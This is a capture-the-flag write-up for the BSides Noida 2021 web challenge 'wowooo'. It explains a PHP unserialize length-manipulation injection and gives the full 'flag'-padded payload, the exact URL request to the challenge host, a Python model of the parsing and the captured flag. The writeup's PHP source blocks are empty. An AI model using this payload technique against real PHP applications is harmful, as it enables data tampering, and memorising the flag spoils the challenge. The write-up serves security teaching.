# Solution

There is nothing interesting on the web page itself, so I look at the source code

```html
PLSSS DONT HACK ME!!!!!!

```

There is an HTML comment containing "**debug**"

So we have to set the "**debug**" HTTP parameter

`34.88.85.200:4001/?debug`

We can see the source code
```php


```
Let's understand the code
```php


```
The rest checks the `debug` HTTP parameter and, if it is set, shows the source *code*

So far we understand the code

To get the **flag**, the second index of the result of `unserialize` must be "V13tN4m_number_one " (note the trailing space, which makes it 19 characters) instead of "Fl4g_in_V13tN4m"

Our *input*, which is combined with the *serialization format* in the `$ser` variable, is inserted without any escaping, so we can do an **injection** attack!

But we can't send `";i:1;s:19:"V13tN4m_number_one ";}` directly, because `strlen($username)` returns the length of our whole payload
```
a:2:{i:0;s:strlen($username):"$username;...

becomes

a:2:{i:0;s:34:"";i:1;s:19:"V13tN4m_number_one ";}...
```
The integer after the **first** `s` must be the length of the **first** string. In our case it is `34`, but the string between the quotes is empty "", so the lengths don't match

So it doesn't work

Luckily there is a `filter` function which replaces "flag" with "flagcc", extending the length of the **first** string by 2 for every occurrence. The function is called after `strlen($username)`, so we can make the *length* of the **first string** equal to the result of `strlen`

After some trial and error to get the lengths to match, the final *payload* looks like this

`flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}`

When we pass that *payload*:
```
before passing to filter function
a:2:{i:0;s:102:"flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}...

after passing to filter function
a:2:{i:0;s:102:"flagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagcc";i:1;s:19:"V13tN4m_number_one ";}..
```
The length of the **first** string `flagccflagcc...` is now 102, which equals the integer after the **first** `s`
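To see why the raw payload is swallowed while the flag-padded one is not, here is an added Python model (not the challenge's PHP and not from the original writeup) that rebuilds the serialized string the way the writeup describes it and parses it with PHP's length-prefixed string rule; the exact tail `s:15:"Fl4g_in_V13tN4m"` is assumed, since the page only shows the prefix. The `filter_first` switch shows the ordering fix: if the filter ran before `strlen`, the declared length would always cover the whole input and the injected tail would stay inside the first string.

```python
import re

INJECTION = '";i:1;s:19:"V13tN4m_number_one ";}'  # tail the writeup appends to the name

def build_serialized(username: str, filter_first: bool = False) -> str:
    # Reconstruction from the writeup: the page only shows the prefix
    # a:2:{i:0;s:strlen($username):"$username";..., so the second element
    # (the flag string) is ASSUMED to be serialized as s:15:"Fl4g_in_V13tN4m".
    if filter_first:
        username = username.replace("flag", "flagcc")  # hardened ordering
    ser = f'a:2:{{i:0;s:{len(username)}:"{username}";i:1;s:15:"Fl4g_in_V13tN4m";}}'
    if not filter_first:
        ser = ser.replace("flag", "flagcc")  # the challenge's filter: runs AFTER strlen
    return ser

def php_unserialize_array(data: str) -> dict:
    # Minimal reader for the subset a:N:{i:K;s:L:"...";...}. Like PHP, it takes
    # exactly L bytes after s:L:" and ignores anything after the closing brace.
    m = re.match(r'a:(\d+):\{', data)
    if not m:
        raise ValueError("expected array")
    count, pos, out = int(m.group(1)), m.end(), {}
    element = re.compile(r'i:(\d+);s:(\d+):"')
    for _ in range(count):
        m = element.match(data, pos)
        if not m:
            raise ValueError(f"bad element at offset {pos}")
        key, length, pos = int(m.group(1)), int(m.group(2)), m.end()
        out[key] = data[pos:pos + length]
        pos += length
        if data[pos:pos + 2] != '";':
            raise ValueError(f"declared length {length} does not end on a quote")
        pos += 2
    if data[pos:pos + 1] != "}":
        raise ValueError("expected end of array")
    return out

def unserialize_name(username: str, filter_first: bool = False) -> dict:
    # What the challenge's unserialize() would return for a given ?name= value.
    return php_unserialize_array(build_serialized(username, filter_first))
```

With the raw injection, `s:34` absorbs the whole tail as element 0 and element 1 stays `Fl4g_in_V13tN4m`; with 17 copies of `flag` in front, the filter grows element 0 to exactly 102 bytes and the parser continues into the injected `i:1`.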

Send that **payload**!!!

`http://34.88.85.200:4001/?name=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag%22;i:1;s:19:%22V13tN4m_number_one%20%22;}`

And there is the flag

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/BSides_Noida_CTF_2021_Writeup/Web/wowooo/info.png)

*flag*: `BSNoida{3z_ch4all_46481684185_!!!!!!@!}`

Original writeup (https://github.com/MikelAcker/CTF_WRITEUPS_2021/tree/main/BSides_Noida_CTF_2021_Writeup/Web/wowooo).